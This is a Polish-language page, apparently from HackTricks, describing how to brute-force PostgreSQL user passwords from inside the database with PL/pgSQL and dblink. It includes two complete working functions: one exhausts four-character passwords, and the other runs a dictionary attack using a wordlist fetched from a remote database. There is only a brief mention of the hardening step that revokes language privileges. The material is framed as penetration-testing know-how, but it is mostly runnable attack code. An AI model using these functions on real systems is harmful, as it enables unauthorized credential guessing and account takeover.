Pracujesz w firmie zajmującej się cyberbezpieczeństwem? Chcesz zobaczyć swoją firmę reklamowaną w HackTricks? A może chcesz mieć dostęp do najnowszej wersji PEASS lub pobrać HackTricks w formacie PDF? Sprawdź PLAN SUBSKRYPCYJNY!
PL/pgSQL to w pełni funkcjonalny język programowania, który wykracza poza możliwości SQL, oferując rozszerzoną kontrolę proceduralną. Obejmuje to wykorzystanie pętli i różnych struktur kontrolnych. Funkcje stworzone w języku PL/pgSQL mogą być wywoływane przez instrukcje SQL i wyzwalacze, poszerzając zakres operacji w środowisku bazy danych.
Możesz wykorzystać ten język, aby poprosić PostgreSQL o przeprowadzenie brutalnego ataku na poświadczenia użytkowników, ale musi on istnieć w bazie danych. Możesz sprawdzić jego istnienie, używając:
SELECT lanname,lanacl FROM pg_language WHERE lanname ='plpgsql';lanname | lanacl---------+---------plpgsql |
Domyślnie tworzenie funkcji jest uprawnieniem udzielonym PUBLIC, gdzie PUBLIC odnosi się do każdego użytkownika w tym systemie baz danych. Aby temu zapobiec, administrator mógłby musieć odebrać uprawnienie USAGE z domeny PUBLIC:
REVOKE ALL PRIVILEGES ONLANGUAGE plpgsql FROM PUBLIC;
W takim przypadku nasze poprzednie zapytanie zwróciłoby różne wyniki:
SELECT lanname,lanacl FROM pg_language WHERE lanname ='plpgsql';lanname | lanacl---------+-----------------plpgsql | {admin=U/admin}
Zauważ, że dla poniższego skryptu funkcja dblink musi istnieć. Jeśli jej nie ma, możesz spróbować ją utworzyć za pomocą
CREATE EXTENSION dblink;
Brute Force Hasła
Oto jak można przeprowadzić brutalny atak na hasło składające się z 4 znaków:
//Create the brute-forcefunctionCREATE OR REPLACEFUNCTIONbrute_force(host TEXT, port TEXT,username TEXT, dbname TEXT) RETURNSTEXTAS$$DECLAREword TEXT;BEGINFOR a IN65..122LOOPFOR b IN65..122LOOPFOR c IN65..122LOOPFOR d IN65..122LOOPBEGINword := chr(a) || chr(b) || chr(c) || chr(d);PERFORM(SELECT*FROM dblink(' host='|| host ||' port='|| port ||' dbname='|| dbname ||' user='|| username ||' password='|| word,'SELECT 1')RETURNS (i INT));RETURN word;EXCEPTIONWHEN sqlclient_unable_to_establish_sqlconnectionTHEN-- do nothingEND;ENDLOOP;ENDLOOP;ENDLOOP;ENDLOOP;RETURNNULL;END;$$ LANGUAGE'plpgsql';//Call the functionselect brute_force('127.0.0.1', '5432', 'postgres', 'postgres');
Należy pamiętać, że nawet próba bruteforce'owania 4 znaków może zająć kilka minut.
Możesz również pobrać listę słów i spróbować tylko tych haseł (ataku słownikowego):
//Create the functionCREATE OR REPLACEFUNCTIONbrute_force(host TEXT, port TEXT,username TEXT, dbname TEXT) RETURNSTEXTAS$$BEGINFOR word IN (SELECT word FROM dblink('host=1.2.3.4user=namepassword=qwertydbname=wordlists','SELECT word FROM wordlist')RETURNS (word TEXT)) LOOPBEGINPERFORM(SELECT*FROM dblink(' host='|| host ||' port='|| port ||' dbname='|| dbname ||' user='|| username ||' password='|| word,'SELECT 1')RETURNS (i INT));RETURN word;EXCEPTIONWHEN sqlclient_unable_to_establish_sqlconnection THEN-- do nothingEND;ENDLOOP;RETURNNULL;END;$$ LANGUAGE'plpgsql'-- Call the functionselect brute_force('127.0.0.1', '5432', 'postgres', 'postgres');
Pracujesz w firmie zajmującej się cyberbezpieczeństwem? Chcesz zobaczyć swoją firmę reklamowaną w HackTricks? A może chcesz mieć dostęp do najnowszej wersji PEASS lub pobrać HackTricks w formacie PDF? Sprawdź PLAN SUBSKRYPCYJNY!